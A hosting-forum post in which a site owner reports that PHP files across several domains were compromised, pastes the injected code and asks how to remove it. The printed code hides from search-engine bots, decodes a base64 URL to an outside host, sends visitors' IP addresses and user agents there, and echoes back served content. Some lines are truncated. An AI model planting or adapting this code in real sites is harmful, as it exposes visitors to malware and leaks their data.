Problem with code inserted in base64_decode php scripts from accounts.

michel.rw

Registered
Jun 13, 2011
1
0
51
Hi there, I have a serious problem.

I have several domains hosted in my reseller, and a few days ago these areas were invaded and changed files "php" accounts.
By checking these changes, I noticed that were inserted the following code in the files:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
**** ****// This code use for global bot statistic
**** ****$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // ****Looks for google serch bot
**** ****$stCurlHandle = NULL;
**** ****$stCurlLink = "";
**** ****if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(st$
**** ****{
**** **** **** ****if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create ****bot analitics
**** **** **** ****$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&dom$
**** **** **** **** **** ****$stCurlHandle = curl_init( $stCurlLink );
**** ****}
**** ****}
if ( $stCurlHandle !== NULL )
{
**** ****curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
**** ****$sResult = @curl_exec($stCurlHandle);
**** ****if ($sResult[0]=="O")
**** **** {$sResult[0]=" ";
**** **** ****echo $sResult; // Statistic code end
**** **** ****}
**** ****curl_close($stCurlHandle);
}
}
?>

Analyzing this code we find that it is an encrypted link that redirects to a page from a server that installs malware on a PC.
Urgently need to remove that code and I can not find a way to remove this code.

I need help.
I learned that with regular expressions would be easier to remove that code from the pages affected.
 
Last edited: